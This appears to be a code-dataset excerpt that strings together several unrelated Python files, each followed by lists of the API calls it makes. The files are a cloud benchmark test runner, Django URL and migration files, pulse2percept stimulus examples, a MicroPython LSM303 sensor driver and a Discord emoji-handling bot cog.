if 'alg' not in output:
output['alg'] = alg
return x, f, eflag, output, lmbda
|
[
"pandapower.pypower.qps_pips.qps_pips"
] |
[((5862, 5911), 'pandapower.pypower.qps_pips.qps_pips', 'qps_pips', (['H', 'c', 'A', 'l', 'u', 'xmin', 'xmax', 'x0', 'pips_opt'], {}), '(H, c, A, l, u, xmin, xmax, x0, pips_opt)\n', (5870, 5911), False, 'from pandapower.pypower.qps_pips import qps_pips\n')]
|
#!/usr/bin/env python
"""
Linux on Hyper-V and Azure Test Code, ver. 1.0.0
Copyright (c) Microsoft Corporation
All rights reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
See the Apache Version 2.0 License for specific language governing
permissions and limitations under the License.
"""
import os
import sys
import copy
import argparse
import logging
import pkgutil
import importlib
from junit_xml import TestSuite, TestCase
import suites
from utils import constants
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)
log = logging.getLogger(__name__)
def run(options):
"""
Main point of entry for running benchmark tests.
"""
sys.stdout.flush()
# lookup suites and tests
suite_names = [suite for _, suite, _ in pkgutil.iter_modules(suites.__path__)]
test_names = {}
for suite in suite_names:
test_names[suite] = [test
for test in dir(importlib.import_module('suites.{}'.format(suite)))
if 'test_' in test]
# validate options
parser = argparse.ArgumentParser(description='Run middleware benchmarking tests.')
mandatory_args = parser.add_argument_group('mandatory arguments')
mandatory_args.add_argument(constants.CLI_SUITE_OPT_SH, constants.CLI_SUITE_OPT,
type=str, default='specific',
help='Provide suite to execute. Defaults to "specific" when '
'"--test" arg is used to execute specific tests.'
'Suites available: {}'.format(
[suite for suite in suite_names]))
mandatory_args.add_argument(constants.CLI_TEST_OPT_SH, constants.CLI_TEST_OPT,
type=str, default='all',
help='When using "--suite specific", a test name or a comma '
'separated list of tests must be provided for execution. '
'Tests available: {}'.format(
[test for suite in suite_names
for test in test_names[suite]]))
mandatory_args.add_argument(constants.CLI_PROVIDER_OPT_SH, constants.CLI_PROVIDER_OPT,
type=str, required=True,
help='Service provider to be used e.g. azure/aws/gce.')
mandatory_args.add_argument(constants.CLI_KEYID_OPT_SH, constants.CLI_KEYID_OPT,
type=str, required=True, help='Azure/aws/gce key id.')
mandatory_args.add_argument(constants.CLI_SECRET_OPT_SH, constants.CLI_SECRET_OPT,
type=str, required=True, help='Azure/aws/gce client secret.')
mandatory_args.add_argument(constants.CLI_LOCAL_PATH_OPT_SH, constants.CLI_LOCAL_PATH_OPT,
type=str, required=True, help='Local path for saving data.')
mandatory_args.add_argument(constants.CLI_INST_TYPE_OPT_SH, constants.CLI_INST_TYPE_OPT,
type=str, required=True,
help='Azure/aws/gce instance size e.g. "Standard_DS1".')
mandatory_args.add_argument(constants.CLI_IMAGEID_OPT_SH, constants.CLI_IMAGEID_OPT,
type=str, required=True,
help='Azure/aws/gce image id or os version e.g. '
'"UbuntuServer#16.04.0-LTS".')
mandatory_args.add_argument(constants.CLI_USER_OPT_SH, constants.CLI_USER_OPT,
type=str, required=True, help='Instance login user.')
parser.add_argument(constants.CLI_TOKEN_OPT_SH, constants.CLI_TOKEN_OPT,
type=str, default='', help='GCE refresh token.')
parser.add_argument(constants.CLI_SUBSCRIPTION_OPT_SH, constants.CLI_SUBSCRIPTION_OPT,
type=str, default='', help='Azure subscription id.')
parser.add_argument(constants.CLI_TENANT_OPT_SH, constants.CLI_TENANT_OPT,
type=str, default='', help='Azure tenant id.')
parser.add_argument(constants.CLI_PROJECTID_OPT_SH, constants.CLI_PROJECTID_OPT,
type=str, default='', help='GCE project id.')
parser.add_argument(constants.CLI_REGION_OPT_SH, constants.CLI_REGION_OPT,
type=str, default='', help='Azure/aws/gce region to connect to.')
parser.add_argument(constants.CLI_ZONE_OPT_SH, constants.CLI_ZONE_OPT,
type=str, default='',
help='Aws/gce specific zone where to create resources e.g. us-west1-a.')
parser.add_argument(constants.CLI_SRIOV_OPT_SH, constants.CLI_SRIOV_OPT,
type=str, default='disabled', help='Enabled/disabled SRIOV feature.')
parser.add_argument(constants.CLI_KERNEL_OPT_SH, constants.CLI_KERNEL_OPT,
type=str, default='', help='Kernel to install from localpath.')
parser.add_argument(constants.CLI_OSVHD_OPT_SH, constants.CLI_OSVHD_OPT,
type=str, default='', help='The OS VHD url')
args = parser.parse_args(options)
test_args = copy.deepcopy(vars(args))
current_suite = test_args['suite']
test_args.pop('suite', None)
current_tests = test_args['test']
test_args.pop('test', None)
junit_testcases = []
if current_suite == 'specific':
selected_tests = current_tests.split(',')
all_tests = [t for s in test_names.values() for t in s]
if not all(sel_test in all_tests for sel_test in selected_tests):
raise Exception('Could not validated all the "specific" tests provided. '
'Use "runner.py -h" to list all the currently supported tests.')
log.info('Tests to run: {}'.format(selected_tests))
for test in selected_tests:
log.info('Running test: {}'.format(test))
try:
module = [k for k, v in test_names.items() if test in v][0]
log.info('import module {}'.format(module))
getattr(importlib.import_module('suites.{}'.format(module)), test)(**test_args)
except Exception as e:
log.info(e)
junit_testcase = TestCase(test)
junit_testcase.add_failure_info(e)
junit_testcases.append(junit_testcase)
continue
junit_testcases.append(TestCase(test))
else:
log.info('Suite to run: {}'.format(current_suite))
if not test_names.get(current_suite, None):
raise Exception('Suite {} not defined. Use "runner.py -h" to list all '
'supported suites.'.format(current_suite))
for test in test_names[current_suite]:
if test_args['provider'] == constants.AZURE and\
test_args['sriov'] == constants.ENABLED and test in constants.SYNTHETIC_TESTS:
log.info('Skipping synthetic test: {}, for SRIOV enabled.'.format(test))
continue
elif test_args['provider'] != constants.AZURE and test in constants.AZURE_TESTS:
log.info('Skipping Azure specific test: {}.'.format(test))
continue
elif test_args['provider'] == constants.GCE and test in constants.NOT_GCE_TESTS:
log.info('Skipping GCE specific test: {}.'.format(test))
continue
else:
log.info('Running test: {}'.format(test))
try:
getattr(importlib.import_module('suites.{}'.format(current_suite)),
test)(**test_args)
except Exception as e:
junit_testcase = TestCase(test)
junit_testcase.add_failure_info(e)
junit_testcases.append(junit_testcase)
continue
junit_testcases.append(TestCase(test))
# generate junit xml
junit_suite = [TestSuite(current_suite, junit_testcases)]
with open(os.path.join(test_args['localpath'], 'junit_{}.xml'.format(current_suite)),
mode='w') as f:
TestSuite.to_file(f, junit_suite, prettyprint=False)
if __name__ == "__main__":
# argv[0] is the script name with the OS location dependent
run(sys.argv[1:])
|
[
"argparse.ArgumentParser",
"logging.basicConfig",
"junit_xml.TestCase",
"pkgutil.iter_modules",
"sys.stdout.flush",
"junit_xml.TestSuite.to_file",
"junit_xml.TestSuite",
"logging.getLogger"
] |
[((958, 1079), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s %(levelname)s: %(message)s"""', 'datefmt': '"""%y/%m/%d %H:%M:%S"""', 'level': 'logging.INFO'}), "(format='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)\n", (977, 1079), False, 'import logging\n'), ((1102, 1129), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1119, 1129), False, 'import logging\n'), ((1223, 1241), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1239, 1241), False, 'import sys\n'), ((1621, 1694), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run middleware benchmarking tests."""'}), "(description='Run middleware benchmarking tests.')\n", (1644, 1694), False, 'import argparse\n'), ((8608, 8649), 'junit_xml.TestSuite', 'TestSuite', (['current_suite', 'junit_testcases'], {}), '(current_suite, junit_testcases)\n', (8617, 8649), False, 'from junit_xml import TestSuite, TestCase\n'), ((8779, 8831), 'junit_xml.TestSuite.to_file', 'TestSuite.to_file', (['f', 'junit_suite'], {'prettyprint': '(False)'}), '(f, junit_suite, prettyprint=False)\n', (8796, 8831), False, 'from junit_xml import TestSuite, TestCase\n'), ((1316, 1353), 'pkgutil.iter_modules', 'pkgutil.iter_modules', (['suites.__path__'], {}), '(suites.__path__)\n', (1336, 1353), False, 'import pkgutil\n'), ((7081, 7095), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (7089, 7095), False, 'from junit_xml import TestSuite, TestCase\n'), ((8547, 8561), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (8555, 8561), False, 'from junit_xml import TestSuite, TestCase\n'), ((6900, 6914), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (6908, 6914), False, 'from junit_xml import TestSuite, TestCase\n'), ((8366, 8380), 'junit_xml.TestCase', 'TestCase', (['test'], {}), '(test)\n', (8374, 8380), False, 'from junit_xml import TestSuite, TestCase\n')]
|
from django.urls import path
from django.conf.urls import url
from coach import views
urlpatterns = [
path(
route = 'new',
view = views.CreateCoachView.as_view(),
name = 'create'
),
path(
route = 'feed',
view = views.CoachFeedView.as_view(),
name = 'feed'
),
path(
route = 'edit/<pk>',
view = views.EditCoachView.as_view(),
name = 'edit'
),
path(
route = '<pk>/delete/',
view = views.CoachDeleteView.as_view(),
name = 'delete'
)
]
|
[
"coach.views.CoachFeedView.as_view",
"coach.views.CreateCoachView.as_view",
"coach.views.EditCoachView.as_view",
"coach.views.CoachDeleteView.as_view"
] |
[((152, 183), 'coach.views.CreateCoachView.as_view', 'views.CreateCoachView.as_view', ([], {}), '()\n', (181, 183), False, 'from coach import views\n'), ((266, 295), 'coach.views.CoachFeedView.as_view', 'views.CoachFeedView.as_view', ([], {}), '()\n', (293, 295), False, 'from coach import views\n'), ((381, 410), 'coach.views.EditCoachView.as_view', 'views.EditCoachView.as_view', ([], {}), '()\n', (408, 410), False, 'from coach import views\n'), ((498, 529), 'coach.views.CoachDeleteView.as_view', 'views.CoachDeleteView.as_view', ([], {}), '()\n', (527, 529), False, 'from coach import views\n')]
|
# -*- coding: utf-8 -*-
"""
===============================================================================
Generating pulse trains
===============================================================================
This example shows how to use :py:class:`~pulse2percept.stimuli.PulseTrain`
and its variants.
Biphasic pulse trains
---------------------
A series of biphasic pulses can be created with the
:py:class:`~pulse2percept.stimuli.BiphasicPulseTrain` class.
You have the same options as when setting up a single
:py:class:`~pulse2percept.stimuli.BiphasicPulse`, in addition to specifying
a pulse train frequency (``freq``) and total stimulus duration (``stim_dur``).
For example, a 20 Hz pulse train lasting 200 ms and made from anodic-first
biphasic pulses (30 uA, 2 ms pulse duration, no interphase gap) can be
created as follows:
"""
# sphinx_gallery_thumbnail_number = 4
from pulse2percept.stimuli import BiphasicPulseTrain
pt = BiphasicPulseTrain(20, 30, 2, stim_dur=200, cathodic_first=False)
pt.plot()
###############################################################################
# You can also limit the number of pulses in the train, but still make the
# stimulus last 200 ms:
pt = BiphasicPulseTrain(20, 30, 2, n_pulses=3, stim_dur=200,
cathodic_first=False)
pt.plot()
###############################################################################
# Asymmetric biphasic pulse trains
# --------------------------------
#
# To create a 20 Hz pulse train lasting 200 ms created from asymmetric biphasic
# pulses, use :py:class:`~pulse2percept.stimuli.AsymmetricBiphasicPulseTrain`:
from pulse2percept.stimuli import AsymmetricBiphasicPulseTrain
# First pulse:
amp1 = 10
phase_dur1 = 2
# Second pulse
amp2 = 2
phase_dur2 = 10
pt = AsymmetricBiphasicPulseTrain(20, amp1, amp2, phase_dur1, phase_dur2,
stim_dur=200)
pt.plot()
###############################################################################
# Biphasic triplet trains
# -----------------------
#
# To create a train of pulse triplets, use
# :py:class:`~pulse2percept.stimuli.BiphasicTripletTrain`:
from pulse2percept.stimuli import BiphasicTripletTrain
amp = 15
phase_dur = 2
pt = BiphasicTripletTrain(20, amp, phase_dur, stim_dur=200)
pt.plot()
###############################################################################
# Generic pulse trains
# --------------------
#
# Finally, you can concatenate any :py:class:`~pulse2percept.stimuli.Stimulus`
# object into a pulse train.
#
# For example, let's define a single ramp stimulus:
import numpy as np
from pulse2percept.stimuli import Stimulus, PulseTrain
# Single ramp:
dt = 1e-3
ramp = Stimulus([[0, 0, 1, 1, 2, 2, 0, 0]],
time=[0, 1, 1 + dt, 2, 2 + dt, 3, 3 + dt, 5 - dt])
ramp.plot()
# Ramp train:
PulseTrain(20, ramp, stim_dur=200).plot()
# Biphasic ramp:
biphasic_ramp = Stimulus(np.concatenate((ramp.data, -ramp.data), axis=1),
time=np.concatenate((ramp.time, ramp.time + 5)))
biphasic_ramp.plot()
# Biphasic ramp train:
PulseTrain(20, biphasic_ramp, stim_dur=200).plot()
|
[
"pulse2percept.stimuli.BiphasicTripletTrain",
"pulse2percept.stimuli.BiphasicPulseTrain",
"pulse2percept.stimuli.PulseTrain",
"pulse2percept.stimuli.Stimulus",
"pulse2percept.stimuli.AsymmetricBiphasicPulseTrain",
"numpy.concatenate"
] |
[((945, 1010), 'pulse2percept.stimuli.BiphasicPulseTrain', 'BiphasicPulseTrain', (['(20)', '(30)', '(2)'], {'stim_dur': '(200)', 'cathodic_first': '(False)'}), '(20, 30, 2, stim_dur=200, cathodic_first=False)\n', (963, 1010), False, 'from pulse2percept.stimuli import BiphasicPulseTrain\n'), ((1207, 1284), 'pulse2percept.stimuli.BiphasicPulseTrain', 'BiphasicPulseTrain', (['(20)', '(30)', '(2)'], {'n_pulses': '(3)', 'stim_dur': '(200)', 'cathodic_first': '(False)'}), '(20, 30, 2, n_pulses=3, stim_dur=200, cathodic_first=False)\n', (1225, 1284), False, 'from pulse2percept.stimuli import BiphasicPulseTrain\n'), ((1783, 1869), 'pulse2percept.stimuli.AsymmetricBiphasicPulseTrain', 'AsymmetricBiphasicPulseTrain', (['(20)', 'amp1', 'amp2', 'phase_dur1', 'phase_dur2'], {'stim_dur': '(200)'}), '(20, amp1, amp2, phase_dur1, phase_dur2,\n stim_dur=200)\n', (1811, 1869), False, 'from pulse2percept.stimuli import AsymmetricBiphasicPulseTrain\n'), ((2233, 2287), 'pulse2percept.stimuli.BiphasicTripletTrain', 'BiphasicTripletTrain', (['(20)', 'amp', 'phase_dur'], {'stim_dur': '(200)'}), '(20, amp, phase_dur, stim_dur=200)\n', (2253, 2287), False, 'from pulse2percept.stimuli import BiphasicTripletTrain\n'), ((2697, 2788), 'pulse2percept.stimuli.Stimulus', 'Stimulus', (['[[0, 0, 1, 1, 2, 2, 0, 0]]'], {'time': '[0, 1, 1 + dt, 2, 2 + dt, 3, 3 + dt, 5 - dt]'}), '([[0, 0, 1, 1, 2, 2, 0, 0]], time=[0, 1, 1 + dt, 2, 2 + dt, 3, 3 +\n dt, 5 - dt])\n', (2705, 2788), False, 'from pulse2percept.stimuli import Stimulus, PulseTrain\n'), ((2913, 2960), 'numpy.concatenate', 'np.concatenate', (['(ramp.data, -ramp.data)'], {'axis': '(1)'}), '((ramp.data, -ramp.data), axis=1)\n', (2927, 2960), True, 'import numpy as np\n'), ((2828, 2862), 'pulse2percept.stimuli.PulseTrain', 'PulseTrain', (['(20)', 'ramp'], {'stim_dur': '(200)'}), '(20, ramp, stim_dur=200)\n', (2838, 2862), False, 'from pulse2percept.stimuli import Stimulus, PulseTrain\n'), ((2992, 3034), 'numpy.concatenate', 'np.concatenate', (['(ramp.time, ramp.time + 5)'], {}), '((ramp.time, ramp.time + 5))\n', (3006, 3034), True, 'import numpy as np\n'), ((3081, 3124), 'pulse2percept.stimuli.PulseTrain', 'PulseTrain', (['(20)', 'biphasic_ramp'], {'stim_dur': '(200)'}), '(20, biphasic_ramp, stim_dur=200)\n', (3091, 3124), False, 'from pulse2percept.stimuli import Stimulus, PulseTrain\n')]
|
"""
lsm303-python // Python library for the LSM303D I2C accelerometer/magnetometer
This file is part of lsm303-python.
[https://github.com/jackw01/lsm303-python]
MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# MODIFIED: imports
#import smbus
#import struct
from ustruct import unpack
#import time
from micropython import const
# MODIFIED ALL: const()
# MODIFIED: 0x19 -> 0x18 ... because of the non-genuine chip maybe
LSM303_ADDRESS_ACCEL = const(0x18) # 0011000x
LSM303_REGISTER_ACCEL_CTRL_REG1_A = const(0x20)
"""
LSM303_REGISTER_ACCEL_CTRL_REG2_A = const(0x21)
LSM303_REGISTER_ACCEL_CTRL_REG3_A = const(0x22)
"""
LSM303_REGISTER_ACCEL_CTRL_REG4_A = const(0x23)
"""
LSM303_REGISTER_ACCEL_CTRL_REG5_A = const(0x24)
LSM303_REGISTER_ACCEL_CTRL_REG6_A = const(0x25)
LSM303_REGISTER_ACCEL_REFERENCE_A = const(0x26)
LSM303_REGISTER_ACCEL_STATUS_REG_A = const(0x27)
"""
LSM303_REGISTER_ACCEL_OUT_X_L_A = const(0x28)
"""
LSM303_REGISTER_ACCEL_FIFO_CTRL_REG_A = const(0x2E)
LSM303_REGISTER_ACCEL_FIFO_SRC_REG_A = const(0x2F)
LSM303_REGISTER_ACCEL_INT1_CFG_A = const(0x30)
LSM303_REGISTER_ACCEL_INT1_SOURCE_A = const(0x31)
LSM303_REGISTER_ACCEL_INT1_THS_A = const(0x32)
LSM303_REGISTER_ACCEL_INT1_DURATION_A = const(0x33)
LSM303_REGISTER_ACCEL_INT2_CFG_A = const(0x34)
LSM303_REGISTER_ACCEL_INT2_SOURCE_A = const(0x35)
LSM303_REGISTER_ACCEL_INT2_THS_A = const(0x36)
LSM303_REGISTER_ACCEL_INT2_DURATION_A = const(0x37)
LSM303_REGISTER_ACCEL_CLICK_CFG_A = const(0x38)
LSM303_REGISTER_ACCEL_CLICK_SRC_A = const(0x39)
LSM303_REGISTER_ACCEL_CLICK_THS_A = const(0x3A)
LSM303_REGISTER_ACCEL_TIME_LIMIT_A = const(0x3B)
LSM303_REGISTER_ACCEL_TIME_LATENCY_A = const(0x3C)
LSM303_REGISTER_ACCEL_TIME_WINDOW_A = const(0x3D)
"""
LSM303_ADDRESS_MAG = const(0x1E) # 0011110x
LSM303_REGISTER_MAG_CRA_REG_M = const(0x00)
LSM303_REGISTER_MAG_CRB_REG_M = const(0x01)
LSM303_REGISTER_MAG_MR_REG_M = const(0x02)
LSM303_REGISTER_MAG_OUT_X_H_M = const(0x03)
"""
LSM303_REGISTER_MAG_OUT_X_L_M = const(0x04)
LSM303_REGISTER_MAG_OUT_Z_H_M = const(0x05)
LSM303_REGISTER_MAG_OUT_Z_L_M = const(0x06)
LSM303_REGISTER_MAG_OUT_Y_H_M = const(0x07)
LSM303_REGISTER_MAG_OUT_Y_L_M = const(0x08)
LSM303_REGISTER_MAG_SR_REG_Mg = const(0x09)
LSM303_REGISTER_MAG_IRA_REG_M = const(0x0A)
LSM303_REGISTER_MAG_IRB_REG_M = const(0x0B)
LSM303_REGISTER_MAG_IRC_REG_M = const(0x0C)
LSM303_REGISTER_MAG_TEMP_OUT_H_M = const(0x31)
LSM303_REGISTER_MAG_TEMP_OUT_L_M = const(0x32)
MAG_GAIN_1_3 = const(0x20) # +/- 1.3
MAG_GAIN_1_9 = const(0x40) # +/- 1.9
MAG_GAIN_2_5 = const(0x60) # +/- 2.5
MAG_GAIN_4_0 = const(0x80) # +/- 4.0
MAG_GAIN_4_7 = const(0xA0) # +/- 4.7
MAG_GAIN_5_6 = const(0xC0) # +/- 5.6
MAG_GAIN_8_1 = const(0xE0) # +/- 8.1
MAG_RATE_0_7 = const(0x00) # 0.75 H
MAG_RATE_1_5 = const(0x01) # 1.5 Hz
MAG_RATE_3_0 = const(0x62) # 3.0 Hz
MAG_RATE_7_5 = const(0x03) # 7.5 Hz
MAG_RATE_15 = const(0x04) # 15 Hz
MAG_RATE_30 = const(0x05) # 30 Hz
MAG_RATE_75 = const(0x06) # 75 Hz
MAG_RATE_220 = const(0x07) # 210 Hz
"""
ACCEL_MS2_PER_LSB = 0.00980665 # meters/second^2 per least significant bit
GAUSS_TO_MICROTESLA = 100.0
class LSM303(object):
"LSM303 3-axis accelerometer/magnetometer"
def __init__(self, i2c, hires=True):
"Initialize the sensor"
self._bus = i2c
# Enable the accelerometer - all 3 channels
self._bus.write_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_CTRL_REG1_A,
[0b01000111])
# Select hi-res (12-bit) or low-res (10-bit) output mode.
# Low-res mode uses less power and sustains a higher update rate,
# output is padded to compatible 12-bit units.
if hires:
self._bus.write_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_CTRL_REG4_A,
[0b00001000])
else:
self._bus.write_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_CTRL_REG4_A,
[0b00000000])
# Enable the magnetometer (Continuous-conversion mode)
self._bus.write_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_MR_REG_M,
[0b00000000])
# MODIFIED : Added block: Disable temperature sensor, minimum data rate: 220Hz
self._bus.write_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_CRA_REG_M,
[0b00011100])
# MODIFIED : Added block: Set mag gain to +-1.3
self._bus.write_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_CRB_REG_M,
[0b00100000])
# MODIFIED : Added block: Instead of 'self.set_mag_gain(MAG_GAIN_1_3)'
self._lsb_per_gauss_xy = const(1100)
self._lsb_per_gauss_z = const(980)
def read_accel(self):
"Read raw acceleration in meters/second squared"
# Read as signed 12-bit little endian values
accel_bytes = self._bus.read_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_OUT_X_L_A | 0x80,
6)
# MODIFIED : struct.unpack -> method import + unpack()
accel_raw = unpack('<hhh', bytearray(accel_bytes))
return (
(accel_raw[0] >> 4) * ACCEL_MS2_PER_LSB,
(accel_raw[1] >> 4) * ACCEL_MS2_PER_LSB,
(accel_raw[2] >> 4) * ACCEL_MS2_PER_LSB,
)
# MODIFIED: excluded methods: set_mag_gain(self, gain), set_mag_rate(self, rate)
def read_mag(self):
"Read raw magnetic field in microtesla"
# Read as signed 16-bit big endian values
mag_bytes = self._bus.read_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_OUT_X_H_M,
6)
# MODIFIED : struct.unpack -> method import + unpack()
mag_raw = unpack('>hhh', bytearray(mag_bytes))
# MODIFIED : Seems like vectors are not swapped on my chip. (ICSG019A by ICStation.com)
return (
mag_raw[0] / self._lsb_per_gauss_xy * GAUSS_TO_MICROTESLA,
mag_raw[1] / self._lsb_per_gauss_xy * GAUSS_TO_MICROTESLA, # MODIFIED : mag_raw[2] -> mag_raw[1]
mag_raw[2] / self._lsb_per_gauss_z * GAUSS_TO_MICROTESLA, # MODIFIED : mag_raw[1] -> mag_raw[2]
)
# MODIFIED: excluded method _test()
|
[
"micropython.const"
] |
[((1570, 1579), 'micropython.const', 'const', (['(24)'], {}), '(24)\n', (1575, 1579), False, 'from micropython import const\n'), ((1638, 1647), 'micropython.const', 'const', (['(32)'], {}), '(32)\n', (1643, 1647), False, 'from micropython import const\n'), ((1814, 1823), 'micropython.const', 'const', (['(35)'], {}), '(35)\n', (1819, 1823), False, 'from micropython import const\n'), ((2102, 2111), 'micropython.const', 'const', (['(40)'], {}), '(40)\n', (2107, 2111), False, 'from micropython import const\n'), ((3063, 3072), 'micropython.const', 'const', (['(30)'], {}), '(30)\n', (3068, 3072), False, 'from micropython import const\n'), ((3130, 3138), 'micropython.const', 'const', (['(0)'], {}), '(0)\n', (3135, 3138), False, 'from micropython import const\n'), ((3186, 3194), 'micropython.const', 'const', (['(1)'], {}), '(1)\n', (3191, 3194), False, 'from micropython import const\n'), ((3242, 3250), 'micropython.const', 'const', (['(2)'], {}), '(2)\n', (3247, 3250), False, 'from micropython import const\n'), ((3298, 3306), 'micropython.const', 'const', (['(3)'], {}), '(3)\n', (3303, 3306), False, 'from micropython import const\n'), ((6925, 6936), 'micropython.const', 'const', (['(1100)'], {}), '(1100)\n', (6930, 6936), False, 'from micropython import const\n'), ((6970, 6980), 'micropython.const', 'const', (['(980)'], {}), '(980)\n', (6975, 6980), False, 'from micropython import const\n')]
|
# Generated by Django 2.2.12 on 2020-05-12 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting_common", "0022_auto_20200505_1707")]
operations = [migrations.DeleteModel(name="SIUnitScale")]
|
[
"django.db.migrations.DeleteModel"
] |
[((212, 254), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""SIUnitScale"""'}), "(name='SIUnitScale')\n", (234, 254), False, 'from django.db import migrations\n')]
|
import discord
import operator
import datetime
import os
import re
import asyncio
import aiohttp
from discord.ext import commands
from __main__ import send_cmd_help, user_allowed
from cogs.utils import checks
from cogs.utils.dataIO import dataIO
from cogs.utils.chat_formatting import box, pagify, escape_mass_mentions
from random import choice
from copy import deepcopy
from cogs.utils.settings import Settings
import PIL
from PIL.Image import core as _imaging
from PIL import Image
#try:
#from PIL import Image
#PIL = True
#except:
#PIL = False
__author__ = "Ordinator"
def plain_uname(user: discord.Member=None):
if user:
name = user.display_name
uid = user.id
nick = user.name
pat = '(?<=^b\').*?(?=\'$)'
#trim = unidecode.unidecode(name)
trim = str(unidecode(user.display_name).encode('ascii', 'ignore'))
#trim = str(name.encode('ascii', 'ignore'))
trim = ' '.join(re.findall(pat,trim)).strip()
#trim = "``\n**UID**: {} \n**Type**: {} \n**Name**: {}\n**Name No-Emote**: {} \n**Pattern**: {} \n``".format(uid, nick, name, trim, pat)
return trim
else:
return ""
def titlecase(s, exceptions=['a', 'an', 'of', 'the', 'is']):
word_list = re.split(' ', s) # re.split behaves as expected
final = [word_list[0].capitalize()]
for word in word_list[1:]:
final.append(word if word in exceptions else word.capitalize())
return " ".join(final)
class Ordcustom:
"""Custom stuff from Ordinator"""
def __init__(self, bot):
self.bot = bot
self.allemojis = []
self.update_all_emoji_list()
def _role_from_string(self, server, rolename, roles=None):
if roles is None:
roles = server.roles
roles = [r for r in roles if r is not None]
role = discord.utils.find(lambda r: r.name.lower() == rolename.lower(),
roles)
return role
async def attempt_cleanup(self, messages):
try:
if len(messages) > 1:
await self.bot.delete_messages(messages)
else:
await self.bot.delete_message(messages[0])
except:
pass
def update_all_emoji_list(self):
self.allemojis = self.bot.get_all_emojis()
return
async def get_emojis_from_message(self, message):
celserver = self.bot.get_server("99607063012843520")
if not message.server == celserver:
return
strin = message.content
if not strin:
return
pnglist = []
repat = re.compile(r"<:([^:]*):(\d*)>", re.IGNORECASE)
#https://cdn.discordapp.com/emojis/306256699134705665.png
path = r"data/ordcustom/emojis/"
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
msg_iter = repat.finditer(strin)
for match in msg_iter:
emoji_name = match.group(1)
emoji_id = match.group(2)
url = "https://cdn.discordapp.com/emojis/{}.png".format(emoji_id)
full_filename_path = path+"{}.{}".format(emoji_name, url[-3:])
pnglist.append(full_filename_path)
try:
async with aiohttp.get(url, headers=option) as r:
emote = await r.read()
with open(full_filename_path, 'wb') as f:
f.write(emote)
except Exception as e:
print(e)
return
if pnglist and len(pnglist) > 1:
ims = "data/ordcustom/" + self.imgprocess(pnglist)
await self.bot.send_file(message.channel, ims)
elif pnglist:
await self.bot.send_file(message.channel, pnglist[0])
def is_command(self, msg):
for m in self.bot.settings.get_prefixes(msg.server):
if msg.content.startswith(m):
return True
return False
def elaborate_response(self, trigger, r):
if trigger.owner != settings.owner:
return "text", r
if not r.startswith("file:"):
return "text", r
else:
path = r.replace("file:", "").strip()
path = os.path.join("data", "trigger", "files", path)
print(path)
if os.path.isfile(path):
return "file", path
else:
return "text", r
async def on_server_emojis_update(self, before, after):
if (before or after):
oldnotinnew = list(set(before) - set(after))
newnotinold = list(set(after) - set(before))
#server = discord.utils.get(discord.client.servers, name='GamerCeleste')
#server = before.server
if (len(before) == 0):
if (len(after) == 0):
return
else:
server = after[0].server
else:
server = before[0].server
oldstr = '\nAn emoji has been removed from this server:\t'
newstr = '\nA new emoji has just been added:\t'
msg = ""
if (len(oldnotinnew) > 0):
#stuff deleted
oldnotinnew.sort(key=operator.attrgetter('name'))
for e in oldnotinnew:
oldstr = oldstr + str(e) + '\t`:' + e.name + ':`\n' + e.url
msg = oldstr
if (len(newnotinold) > 0):
#stuff added
newnotinold.sort(key=operator.attrgetter('name'))
for e in newnotinold:
newstr = newstr + str(e) + '\t`:' + e.name + ':`\n' + e.url
msg = newstr
if msg:
return #await self.bot.send_message(server, msg)
async def on_message(self, message):
channel = message.channel
author = message.author
celserver = self.bot.get_server("99607063012843520")
if self.is_command(message):
return
if message.server is None:
return
if author == self.bot.user:
return
